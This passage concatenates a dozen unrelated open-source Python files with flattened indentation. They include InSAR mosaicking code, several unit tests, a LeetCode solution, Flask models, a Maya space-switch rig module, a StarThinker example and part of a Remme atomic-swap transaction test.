swathMosaicParameters(secondaryTrack.frames[i], rangeOffsets, azimuthOffsets, self._insar.numberRangeLooks1, self._insar.numberAzimuthLooks1)
os.chdir('../')
#save parameter file
self._insar.saveProduct(referenceTrack.frames[i], self._insar.referenceFrameParameter)
self._insar.saveProduct(secondaryTrack.frames[i], self._insar.secondaryFrameParameter)
os.chdir('../')
#mosaic spectral diversity interferograms
for i, frameNumber in enumerate(self._insar.referenceFrames):
frameDir = 'f{}_{}'.format(i+1, frameNumber)
os.chdir(frameDir)
mosaicDir = 'mosaic'
os.makedirs(mosaicDir, exist_ok=True)
os.chdir(mosaicDir)
if self._insar.endingSwath-self._insar.startingSwath+1 == 1:
import shutil
swathDir = 's{}'.format(referenceTrack.frames[i].swaths[0].swathNumber)
for sdFile in self._insar.interferogramSd:
if not os.path.isfile(sdFile):
os.symlink(os.path.join('../', swathDir, 'spectral_diversity', sdFile), sdFile)
shutil.copy2(os.path.join('../', swathDir, 'spectral_diversity', sdFile+'.vrt'), sdFile+'.vrt')
shutil.copy2(os.path.join('../', swathDir, 'spectral_diversity', sdFile+'.xml'), sdFile+'.xml')
os.chdir('../')
os.chdir('../')
continue
#choose offsets
numberOfFrames = len(referenceTrack.frames)
numberOfSwaths = len(referenceTrack.frames[i].swaths)
if self.swathOffsetMatching:
#no need to do this as the API support 2-d list
#rangeOffsets = (np.array(self._insar.swathRangeOffsetMatchingReference)).reshape(numberOfFrames, numberOfSwaths)
#azimuthOffsets = (np.array(self._insar.swathAzimuthOffsetMatchingReference)).reshape(numberOfFrames, numberOfSwaths)
rangeOffsets = self._insar.swathRangeOffsetMatchingReference
azimuthOffsets = self._insar.swathAzimuthOffsetMatchingReference
else:
#rangeOffsets = (np.array(self._insar.swathRangeOffsetGeometricalReference)).reshape(numberOfFrames, numberOfSwaths)
#azimuthOffsets = (np.array(self._insar.swathAzimuthOffsetGeometricalReference)).reshape(numberOfFrames, numberOfSwaths)
rangeOffsets = self._insar.swathRangeOffsetGeometricalReference
azimuthOffsets = self._insar.swathAzimuthOffsetGeometricalReference
rangeOffsets = rangeOffsets[i]
azimuthOffsets = azimuthOffsets[i]
#list of input files
inputSd = [[], [], []]
for j, swathNumber in enumerate(range(self._insar.startingSwath, self._insar.endingSwath + 1)):
swathDir = 's{}'.format(swathNumber)
for k, sdFile in enumerate(self._insar.interferogramSd):
inputSd[k].append(os.path.join('../', swathDir, 'spectral_diversity', sdFile))
#mosaic spectral diversity interferograms
for inputSdList, outputSdFile in zip(inputSd, self._insar.interferogramSd):
swathMosaic(referenceTrack.frames[i], inputSdList, outputSdFile,
rangeOffsets, azimuthOffsets, self._insar.numberRangeLooks1, self._insar.numberAzimuthLooks1, updateFrame=False, phaseCompensation=True, pcRangeLooks=5, pcAzimuthLooks=5, filt=True, resamplingMethod=1)
for sdFile in self._insar.interferogramSd:
create_xml(sdFile, referenceTrack.frames[i].numberOfSamples, referenceTrack.frames[i].numberOfLines, 'int')
os.chdir('../')
os.chdir('../')
catalog.printToLog(logger, "runSwathMosaic")
self._insar.procDoc.addAllFromCatalog(catalog)
|
manubot/cite/tests/test_pubmed.py | benstear/manubot | 299 | 12748972 | import pytest
from manubot.cite.pubmed import (
get_pmcid_and_pmid_for_doi,
get_pmid_for_doi,
get_pubmed_ids_for_doi,
)
@pytest.mark.parametrize(
("doi", "pmid"),
[
("10.1098/rsif.2017.0387", "29618526"), # in PubMed and PMC
("10.1161/CIRCGENETICS.115.001181", "27094199"), # in PubMed but not PMC
("10.7717/peerj-cs.134", None), # DOI in journal not indexed by PubMed
("10.1161/CIRC", None), # invalid DOI
],
)
def test_get_pmid_for_doi(doi, pmid):
output = get_pmid_for_doi(doi)
assert pmid == output
@pytest.mark.parametrize(
("doi", "id_dict"),
[
("10.1098/rsif.2017.0387", {"PMCID": "PMC5938574", "PMID": "29618526"}),
("10.7554/ELIFE.32822", {"PMCID": "PMC5832410", "PMID": "29424689"}),
("10.1161/CIRCGENETICS.115.001181", {}), # only in PubMed, not in PMC
("10.7717/peerj.000", {}), # Non-existent DOI
("10.peerj.000", {}), # malformed DOI
],
)
def test_get_pmcid_and_pmid_for_doi(doi, id_dict):
output = get_pmcid_and_pmid_for_doi(doi)
assert id_dict == output
@pytest.mark.parametrize(
("doi", "id_dict"),
[
("10.1098/rsif.2017.0387", {"PMCID": "PMC5938574", "PMID": "29618526"}),
("10.7554/ELIFE.32822", {"PMCID": "PMC5832410", "PMID": "29424689"}),
(
"10.1161/CIRCGENETICS.115.001181",
{"PMID": "27094199"},
), # only in PubMed, not in PMC
("10.7717/peerj.000", {}), # Non-existent DOI
],
)
def test_get_pubmed_ids_for_doi(doi, id_dict):
output = get_pubmed_ids_for_doi(doi)
assert id_dict == output
|
Python/split-a-string-in-balanced-strings.py | shreyventure/LeetCode-Solutions | 388 | 12749011 | class Solution:
"""
Time Complexity: O(N)
Space Complexity: O(1)
"""
def balanced_string_split(self, s: str) -> int:
# initialize variables
L_count, R_count = 0, 0
balanced_substring_count = 0
# parse the string
for char in s:
# update the number of Ls and the number of Rs so far
if char == 'L':
L_count += 1
elif char == 'R':
R_count += 1
# if the string is balanced, increment the balanced substrings count and reset the counters
if L_count == R_count:
balanced_substring_count += 1
L_count, R_count = 0, 0
return balanced_substring_count
|
Chapter10/webapp/blog/models.py | jayakumardhananjayan/pythonwebtut | 135 | 12749019 | import datetime
from .. import db
tags = db.Table(
'post_tags',
db.Column('post_id', db.Integer, db.ForeignKey('post.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id'))
)
class Post(db.Model):
id = db.Column(db.Integer(), primary_key=True)
title = db.Column(db.String(255), nullable=False)
text = db.Column(db.Text(), nullable=False)
publish_date = db.Column(db.DateTime(), default=datetime.datetime.now)
user_id = db.Column(db.Integer(), db.ForeignKey('user.id'))
comments = db.relationship(
'Comment',
backref='post',
lazy='dynamic'
)
tags = db.relationship(
'Tag',
secondary=tags,
backref=db.backref('posts', lazy='dynamic')
)
def __init__(self, title=""):
self.title = title
def __repr__(self):
return "<Post '{}'>".format(self.title)
class Comment(db.Model):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(255), nullable=False)
text = db.Column(db.Text(), nullable=False)
date = db.Column(db.DateTime(), default=datetime.datetime.now)
post_id = db.Column(db.Integer(), db.ForeignKey('post.id'))
def __repr__(self):
return "<Comment '{}'>".format(self.text[:15])
class Tag(db.Model):
id = db.Column(db.Integer(), primary_key=True)
title = db.Column(db.String(255), nullable=False, unique=True)
def __init__(self, title=""):
self.title = title
def __repr__(self):
return "<Tag '{}'>".format(self.title)
class Reminder(db.Model):
id = db.Column(db.Integer(), primary_key=True)
date = db.Column(db.DateTime())
email = db.Column(db.String())
text = db.Column(db.Text())
def __repr__(self):
return "<Reminder '{}'>".format(self.text[:20])
|
tests/data/test_unsupervised_sampler.py | LarsNeR/stellargraph | 2,428 | 12749027 | <filename>tests/data/test_unsupervised_sampler.py
# -*- coding: utf-8 -*-
#
# Copyright 2017-2020 Data61, CSIRO
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import numpy as np
from collections import defaultdict
from stellargraph.data.unsupervised_sampler import UnsupervisedSampler
from stellargraph.data.explorer import UniformRandomWalk
from ..test_utils.graphs import line_graph
def test_init_parameters(line_graph):
# if no graph is provided
with pytest.raises(ValueError):
UnsupervisedSampler(G=None)
# walk must have length strictly greater than 1
with pytest.raises(ValueError):
UnsupervisedSampler(G=line_graph, length=1)
# at least 1 walk from each root node
with pytest.raises(ValueError):
UnsupervisedSampler(G=line_graph, number_of_walks=0)
# nodes nodes parameter should be an iterable of node IDs
with pytest.raises(ValueError):
UnsupervisedSampler(G=line_graph, nodes=1)
# if no root nodes are provided for sampling defaulting to using all nodes as root nodes
sampler = UnsupervisedSampler(G=line_graph, nodes=None)
assert sampler.nodes == list(line_graph.nodes())
def test_run_batch_sizes(line_graph):
batch_size = 4
sampler = UnsupervisedSampler(G=line_graph, length=2, number_of_walks=2)
batches = sampler.run(batch_size)
# check batch sizes
assert len(batches) == np.ceil(len(line_graph.nodes()) * 4 / batch_size)
for ids, labels in batches[:-1]:
assert len(ids) == len(labels) == batch_size
# last batch can be smaller
ids, labels = batches[-1]
assert len(ids) == len(labels)
assert len(ids) <= batch_size
def test_run_context_pairs(line_graph):
batch_size = 4
sampler = UnsupervisedSampler(G=line_graph, length=2, number_of_walks=2)
batches = sampler.run(batch_size)
grouped_by_target = defaultdict(list)
for ids, labels in batches:
for (target, context), label in zip(ids, labels):
grouped_by_target[target].append((context, label))
assert len(grouped_by_target) == len(line_graph.nodes())
for target, sampled in grouped_by_target.items():
# exactly 2 positive and 2 negative context pairs for each target node
assert len(sampled) == 4
# since each walk has length = 2, there must be an edge between each positive context pair
for context, label in sampled:
if label == 1:
assert context in set(line_graph.neighbors(target))
def test_walker_uniform_random(line_graph):
length = 3
number_of_walks = 2
batch_size = 4
walker = UniformRandomWalk(line_graph, n=number_of_walks, length=length)
sampler = UnsupervisedSampler(line_graph, walker=walker)
batches = sampler.run(batch_size)
# batches should match the parameters used to create the walker object, instead of the defaults
# for UnsupervisedSampler
expected_num_batches = np.ceil(
line_graph.number_of_nodes() * number_of_walks * (length - 1) * 2 / batch_size
)
assert len(batches) == expected_num_batches
class CustomWalker:
def run(self, nodes):
return [[node, node] for node in nodes]
def test_walker_custom(line_graph):
walker = CustomWalker()
sampler = UnsupervisedSampler(line_graph, walker=walker)
batches = sampler.run(2)
assert len(batches) == line_graph.number_of_nodes()
# all positive examples should be self loops, since we defined our custom walker this way
for context_pairs, labels in batches:
for node, neighbour in context_pairs[labels == 1]:
assert node == neighbour
def test_ignored_param_warning(line_graph):
walker = UniformRandomWalk(line_graph, n=2, length=3)
with pytest.raises(ValueError, match="cannot specify both 'walker' and 'length'"):
UnsupervisedSampler(line_graph, walker=walker, length=5)
with pytest.raises(
ValueError, match="cannot specify both 'walker' and 'number_of_walks'"
):
UnsupervisedSampler(line_graph, walker=walker, number_of_walks=5)
with pytest.raises(ValueError, match="cannot specify both 'walker' and 'seed'"):
UnsupervisedSampler(line_graph, walker=walker, seed=1)
|
Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 28/28.py | jaswinder9051998/Resources | 101 | 12749144 | <gh_stars>100-1000
#Why is the error and how to fix it?
#A: A TypeError menas you are using the wrong type to make an operation. Change print(a+b) to return a+b
def foo(a, b):
print(a + b)
x = foo(2, 3) * 10
|
core/native/vendor/cx_Freeze-5.0.1/cx_Freeze/samples/simple/hello.py | tensorlang/nao | 332 | 12749152 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from datetime import datetime
import sys
from sys import stdout
stdout.write('Hello from cx_Freeze\n')
stdout.write('The current date is %s\n\n' %
datetime.today().strftime('%B %d, %Y %H:%M:%S'))
stdout.write('Executable: %r\n' % sys.executable)
stdout.write('Prefix: %r\n' % sys.prefix)
stdout.write('Default encoding: %r\n' % sys.getdefaultencoding())
stdout.write('File system encoding: %r\n\n' % sys.getfilesystemencoding())
stdout.write('ARGUMENTS:\n')
for a in sys.argv:
stdout.write('%s\n' % a)
stdout.write('\n')
stdout.write('PATH:\n')
for p in sys.path:
stdout.write('%s\n' % p)
stdout.write('\n')
|
lite/tests/unittest_py/op/test_linspace_op.py | 714627034/Paddle-Lite | 808 | 12749159 | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('../')
from auto_scan_test import AutoScanTest, IgnoreReasons
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume
import hypothesis.strategies as st
import argparse
import numpy as np
from functools import partial
class TestLinspaceOp(AutoScanTest):
def __init__(self, *args, **kwargs):
AutoScanTest.__init__(self, *args, **kwargs)
self.enable_testing_on_place(
TargetType.Host,
PrecisionType.FP32,
DataLayoutType.NCHW,
thread=[1, 2])
def is_program_valid(self,
program_config: ProgramConfig,
predictor_config: CxxConfig) -> bool:
return True
def sample_program_configs(self, draw):
start_id = draw(st.integers(min_value=0, max_value=5))
stop_id = draw(st.integers(min_value=50, max_value=60))
num_data = draw(st.integers(min_value=1, max_value=10))
op_type_str = draw(st.sampled_from(
[5])) #2:int 5:float, lite only support float
def generate_start1(*args, **kwargs):
return np.array([float(start_id)]).astype(np.float32)
def generate_start2(*args, **kwargs):
return np.array([int(start_id)]).astype(np.int32)
def generate_stop1(*args, **kwargs):
return np.array([float(stop_id)]).astype(np.float32)
def generate_stop2(*args, **kwargs):
return np.array([int(stop_id)]).astype(np.int32)
def generate_num(*args, **kwargs):
return np.array([int(num_data)]).astype(np.int32)
build_ops = OpConfig(
type="linspace",
inputs={
"Start": ["start_data"],
"Stop": ["stop_data"],
"Num": ["num_data"],
},
outputs={"Out": ["output_data"], },
attrs={"dtype": int(op_type_str)})
if op_type_str == 2:
program_config = ProgramConfig(
ops=[build_ops],
weights={},
inputs={
"start_data":
TensorConfig(data_gen=partial(generate_start2)),
"stop_data":
TensorConfig(data_gen=partial(generate_stop2)),
"num_data": TensorConfig(data_gen=partial(generate_num)),
},
outputs=["output_data"])
elif op_type_str == 5:
program_config = ProgramConfig(
ops=[build_ops],
weights={},
inputs={
"start_data":
TensorConfig(data_gen=partial(generate_start1)),
"stop_data":
TensorConfig(data_gen=partial(generate_stop1)),
"num_data": TensorConfig(data_gen=partial(generate_num)),
},
outputs=["output_data"])
return program_config
def sample_predictor_configs(self):
return self.get_predictor_configs(), ["linspace"], (1e-5, 1e-5)
def add_ignore_pass_case(self):
pass
def test(self, *args, **kwargs):
self.run_and_statis(quant=False, max_examples=25)
if __name__ == "__main__":
unittest.main(argv=[''])
|
scripts/cmt/rig/spaceswitch.py | kamilisa/cmt | 199 | 12749173 | """Space switching without constraints or extra DAG nodes.
Contains functions to create a space switching network as well as seamlessly switching
between spaces.
Example Usage
=============
::
import cmt.rig.spaceswitch as spaceswitch
# Create the space switch
spaceswitch.create_space_switch(
pole_vector_control,
[(ik_control, "foot"), (root_control, "root"), (world_control, "world")],
switch_attribute="space",
use_rotate=False,
)
# Seamless switch
spaceswitch.switch_space(pole_vector_control, "space", 1, create_keys=False)
"""
import maya.cmds as cmds
import maya.api.OpenMaya as OpenMaya
from cmt.dge import dge
import cmt.rig.common as common
import cmt.shortcuts as shortcuts
def create_space_switch(
node, drivers, switch_attribute=None, use_translate=True, use_rotate=True
):
"""Creates a space switch network.
The network uses the offsetParentMatrix attribute and does not create any
constraints or new dag nodes.
:param node: Transform to drive
:param drivers: List of tuples: [(driver1, "spaceName1"), (driver2, "spaceName2")]
:param switch_attribute: Name of the switch attribute to create on the target node.
"""
if switch_attribute is None:
switch_attribute = "space"
if cmds.objExists("{}.{}".format(node, switch_attribute)):
cmds.deleteAttr(node, at=switch_attribute)
names = [d[1] for d in drivers]
cmds.addAttr(node, ln=switch_attribute, at="enum", en=":".join(names), keyable=True)
# Create attribute to toggle translation in the matrices
enable_translate_attr = _create_bool_attribute(
node, "{}UseTranslate".format(switch_attribute), use_translate
)
# Create attribute to toggle rotation in the matrices
enable_rotate_attr = _create_bool_attribute(
node, "{}UseRotate".format(switch_attribute), use_rotate
)
blend = cmds.createNode("blendMatrix", name="{}_spaceswitch".format(node))
# Get the current offset parent matrix. This is used as the starting blend point
m = OpenMaya.MMatrix(cmds.getAttr("{}.offsetParentMatrix".format(node)))
cmds.setAttr("{}.inputMatrix".format(blend), list(m), type="matrix")
parent = cmds.listRelatives(node, parent=True, path=True)
to_parent_local = "{}.worldInverseMatrix[0]".format(parent[0]) if parent else None
for i, driver in enumerate(drivers):
driver = driver[0]
_connect_driver_matrix_network(blend, node, driver, i, to_parent_local)
target_attr = "{}.target[{}]".format(blend, i)
# Hook up the weight toggle when switching spaces
dge(
"x = switch == {} ? 1 : 0".format(i),
x="{}.weight".format(target_attr),
switch="{}.{}".format(node, switch_attribute),
)
# Connect the translation, rotation toggles
cmds.connectAttr(enable_translate_attr, "{}.useTranslate".format(target_attr))
cmds.connectAttr(enable_rotate_attr, "{}.useRotate".format(target_attr, i))
cmds.connectAttr(
"{}.outputMatrix".format(blend), "{}.offsetParentMatrix".format(node)
)
def _create_bool_attribute(node, attribute, default_value):
cmds.addAttr(
node, ln=attribute, at="bool", defaultValue=default_value, keyable=True
)
return "{}.{}".format(node, attribute)
def _connect_driver_matrix_network(blend, node, driver, index, to_parent_local):
# The multMatrix node will calculate the transformation to blend to when driven
# by this driver transform
mult = cmds.createNode(
"multMatrix", name="spaceswitch_{}_to_{}".format(node, driver)
)
offset = (
shortcuts.get_dag_path2(node).exclusiveMatrix()
* OpenMaya.MMatrix(cmds.getAttr("{}.worldInverseMatrix[0]".format(driver)))
)
cmds.setAttr("{}.matrixIn[0]".format(mult), list(offset), type="matrix")
cmds.connectAttr("{}.worldMatrix[0]".format(driver), "{}.matrixIn[1]".format(mult))
if to_parent_local:
cmds.connectAttr(to_parent_local, "{}.matrixIn[2]".format(mult))
cmds.connectAttr(
"{}.matrixSum".format(mult), "{}.target[{}].targetMatrix".format(blend, index)
)
def switch_space(node, attribute, space, create_keys=False):
"""Seamlessly switch between spaces
:param node: Node to switch
:param attribute: Space switching attribute on node
:param space: Space index in the space attribute
:param create_keys: True to create switching keys
"""
m = cmds.xform(node, q=True, ws=True, m=True)
cmds.setAttr("{}.{}".format(node, attribute), space)
cmds.xform(node, ws=True, m=m)
|
nmigen/hdl/mem.py | psumesh/nmigen | 528 | 12749228 | from amaranth.hdl.mem import *
from amaranth.hdl.mem import __all__
import warnings
warnings.warn("instead of nmigen.hdl.mem, use amaranth.hdl.mem",
DeprecationWarning, stacklevel=2)
|
examples/smartsheet_report_to_bigquery_example.py | Ressmann/starthinker | 138 | 12749270 | <reponame>Ressmann/starthinker<filename>examples/smartsheet_report_to_bigquery_example.py
###########################################################################
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
#
# This code generated (see scripts folder for possible source):
# - Command: "python starthinker_ui/manage.py example"
#
###########################################################################
import argparse
import textwrap
from starthinker.util.configuration import Configuration
from starthinker.task.smartsheet.run import smartsheet
def recipe_smartsheet_report_to_bigquery(config, auth_read, auth_write, token, report, dataset, table, schema):
"""Move report data into a BigQuery table.
Args:
auth_read (authentication) - Credentials used for reading data.
auth_write (authentication) - Credentials used for writing data.
token (string) - Retrieve from SmartSheet account settings.
report (string) - Retrieve from report properties.
dataset (string) - Existing BigQuery dataset.
table (string) - Table to create from this report.
schema (json) - Schema provided in JSON list format or leave empty to auto detect.
"""
smartsheet(config, {
'auth':auth_read,
'token':token,
'report':report,
'out':{
'bigquery':{
'auth':auth_write,
'dataset':dataset,
'table':table,
'schema':schema
}
}
})
if __name__ == "__main__":
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent("""
Move report data into a BigQuery table.
1. Specify <a href='https://smartsheet-platform.github.io/api-docs/' target='_blank'>SmartSheet Report</a> token.
2. Locate the ID of a report by viewing its properties.
3. Provide a BigQuery dataset ( must exist ) and table to write the data into.
4. StarThinker will automatically map the correct schema.
"""))
parser.add_argument("-project", help="Cloud ID of Google Cloud Project.", default=None)
parser.add_argument("-key", help="API Key of Google Cloud Project.", default=None)
parser.add_argument("-client", help="Path to CLIENT credentials json file.", default=None)
parser.add_argument("-user", help="Path to USER credentials json file.", default=None)
parser.add_argument("-service", help="Path to SERVICE credentials json file.", default=None)
parser.add_argument("-verbose", help="Print all the steps as they happen.", action="store_true")
parser.add_argument("-auth_read", help="Credentials used for reading data.", default='user')
parser.add_argument("-auth_write", help="Credentials used for writing data.", default='service')
parser.add_argument("-token", help="Retrieve from SmartSheet account settings.", default='')
parser.add_argument("-report", help="Retrieve from report properties.", default=None)
parser.add_argument("-dataset", help="Existing BigQuery dataset.", default='')
parser.add_argument("-table", help="Table to create from this report.", default='')
parser.add_argument("-schema", help="Schema provided in JSON list format or leave empty to auto detect.", default=None)
args = parser.parse_args()
config = Configuration(
project=args.project,
user=args.user,
service=args.service,
client=args.client,
key=args.key,
verbose=args.verbose
)
recipe_smartsheet_report_to_bigquery(config, args.auth_read, args.auth_write, args.token, args.report, args.dataset, args.table, args.schema)
|
testing/unit/tp/atomic_swap/test_init.py | FerrySchuller/remme-core | 129 | 12749301 | """
Provide tests for atomic swap handler initialization method implementation.
"""
import datetime
import time
import pytest
from sawtooth_sdk.processor.exceptions import InvalidTransaction
from sawtooth_sdk.protobuf.processor_pb2 import TpProcessRequest
from sawtooth_sdk.protobuf.setting_pb2 import Setting
from sawtooth_sdk.protobuf.transaction_pb2 import (
Transaction,
TransactionHeader,
)
from testing.conftest import create_signer
from testing.mocks.stub import StubContext
from testing.utils.client import proto_error_msg
from remme.clients.block_info import (
CONFIG_ADDRESS,
BlockInfoClient,
)
from remme.protos.account_pb2 import Account
from remme.protos.atomic_swap_pb2 import (
AtomicSwapInfo,
AtomicSwapInitPayload,
AtomicSwapMethod,
)
from remme.protos.block_info_pb2 import BlockInfo, BlockInfoConfig
from remme.protos.transaction_pb2 import TransactionPayload
from remme.shared.utils import hash512
from remme.settings import (
SETTINGS_KEY_ZERO_ADDRESS_OWNERS,
SETTINGS_SWAP_COMMISSION,
ZERO_ADDRESS,
)
from remme.settings.helper import _make_settings_key
from remme.tp.atomic_swap import AtomicSwapHandler
from remme.tp.basic import BasicHandler
TOKENS_AMOUNT_TO_SWAP = 200
SWAP_COMMISSION_AMOUNT = 100
BOT_ETHEREUM_ADDRESS = '0xe6ca0e7c974f06471759e9a05d18b538c5ced11e'
BOT_PRIVATE_KEY = '<KEY>'
BOT_PUBLIC_KEY = '03ecc5cb4094eb05319be6c7a63ebf17133d4ffaea48cdcfd1d5fc79dac7db7b6b'
BOT_ADDRESS = '112007b9433e1da5c624ff926477141abedfd57585a36590b0a8edc4104ef28093ee30'
ALICE_ETHEREUM_ADDRESS = '0x8dfe0f55a1cf9b22b8c85a9ff7a85a28a3879f71'
ALICE_ADDRESS = '112007db8a00c010402e2e3a7d03491323e761e0ea612481c518605648ceeb5ed454f7'
ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR = '0x6f4d5666332f5a575a714d4245624455612f2b4345424f704b4256704f5'
BOT_IT_IS_INITIATOR_MARK = ''
SWAP_ID = '033102e41346242476b15a3a7966eb5249271025fc7fb0b37ed3fdb4bcce3884'
ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY = _make_settings_key(SETTINGS_SWAP_COMMISSION)
ADDRESS_TO_GET_GENESIS_MEMBERS_AS_STRING_BY = _make_settings_key(SETTINGS_KEY_ZERO_ADDRESS_OWNERS)
ADDRESS_TO_STORE_SWAP_INFO_BY = BasicHandler(
name=AtomicSwapHandler().family_name, versions=AtomicSwapHandler()._family_versions[0]
).make_address_from_data(data=SWAP_ID)
TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS = {
'family_name': AtomicSwapHandler().family_name,
'family_version': AtomicSwapHandler()._family_versions[0],
}
RANDOM_NODE_PUBLIC_KEY = '<KEY>'
RANDOM_PUBLIC_KEY = '<KEY>'
CURRENT_TIMESTAMP = int(datetime.datetime.now().timestamp())
BLOCK_INFO_CONFIG_ADDRESS = CONFIG_ADDRESS
BLOCK_INFO_ADDRESS = BlockInfoClient.create_block_address(1000)
block_info_config = BlockInfoConfig()
block_info_config.latest_block = 1000
SERIALIZED_BLOCK_INFO_CONFIG = block_info_config.SerializeToString()
block_info = BlockInfo()
block_info.timestamp = CURRENT_TIMESTAMP
SERIALIZED_BLOCK_INFO = block_info.SerializeToString()
INPUTS = [
ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY,
BLOCK_INFO_CONFIG_ADDRESS,
BLOCK_INFO_ADDRESS,
BOT_ADDRESS,
ZERO_ADDRESS,
ADDRESS_TO_STORE_SWAP_INFO_BY,
]
OUTPUTS = [
ADDRESS_TO_STORE_SWAP_INFO_BY,
ZERO_ADDRESS,
BOT_ADDRESS,
]
def test_atomic_swap_init_with_empty_proto():
"""
Case: send empty proto for init
Expect: invalid transaction error
"""
inputs = outputs = [
ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY,
BLOCK_INFO_CONFIG_ADDRESS,
BLOCK_INFO_ADDRESS,
BOT_ADDRESS,
ZERO_ADDRESS,
ADDRESS_TO_STORE_SWAP_INFO_BY,
ADDRESS_TO_GET_GENESIS_MEMBERS_AS_STRING_BY,
]
atomic_swap_init_payload = AtomicSwapInitPayload()
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=inputs,
outputs=outputs,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
mock_context = StubContext(inputs=inputs, outputs=outputs, initial_state={})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
assert proto_error_msg(
AtomicSwapInitPayload,
{
'receiver_address': ['Missed address'],
'sender_address_non_local': ['This field is required.'],
'amount': ['This field is required.'],
'swap_id': ['Missed swap_id'],
'created_at': ['This field is required.'],
}
) == str(error.value)
def test_atomic_swap_init():
"""
Case: initialize swap of bot's Remme node tokens to Alice's ERC20 Remme tokens.
Expect: bot sends commission to the zero account address, swap amount is decreased from bot account.
"""
atomic_swap_init_payload = AtomicSwapInitPayload(
receiver_address=ALICE_ADDRESS,
sender_address_non_local=BOT_ETHEREUM_ADDRESS,
amount=TOKENS_AMOUNT_TO_SWAP,
swap_id=SWAP_ID,
secret_lock_by_solicitor=BOT_IT_IS_INITIATOR_MARK,
email_address_encrypted_by_initiator=ALICE_EMAIL_ADDRESS_ENCRYPTED_BY_INITIATOR,
created_at=CURRENT_TIMESTAMP,
)
transaction_payload = TransactionPayload()
transaction_payload.method = AtomicSwapMethod.INIT
transaction_payload.data = atomic_swap_init_payload.SerializeToString()
serialized_transaction_payload = transaction_payload.SerializeToString()
transaction_header = TransactionHeader(
signer_public_key=BOT_PUBLIC_KEY,
family_name=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_name'),
family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
bot_account = Account()
bot_account.balance = 5000
serialized_bot_account = bot_account.SerializeToString()
zero_account = Account()
zero_account.balance = 0
serialized_zero_account = zero_account.SerializeToString()
swap_commission_setting = Setting()
swap_commission_setting.entries.add(key=SETTINGS_SWAP_COMMISSION, value=str(SWAP_COMMISSION_AMOUNT))
serialized_swap_commission_setting = swap_commission_setting.SerializeToString()
genesis_members_setting = Setting()
genesis_members_setting.entries.add(key=SETTINGS_KEY_ZERO_ADDRESS_OWNERS, value=f'{BOT_PUBLIC_KEY},')
serialized_genesis_members_setting = genesis_members_setting.SerializeToString()
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={
BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG,
BLOCK_INFO_ADDRESS: SERIALIZED_BLOCK_INFO,
BOT_ADDRESS: serialized_bot_account,
ZERO_ADDRESS: serialized_zero_account,
ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY: serialized_swap_commission_setting,
ADDRESS_TO_GET_GENESIS_MEMBERS_AS_STRING_BY: serialized_genesis_members_setting,
})
swap_info = AtomicSwapInfo()
swap_info.swap_id = SWAP_ID
swap_info.state = AtomicSwapInfo.OPENED
swap_info.amount = TOKENS_AMOUNT_TO_SWAP
swap_info.created_at = CURRENT_TIMESTAMP
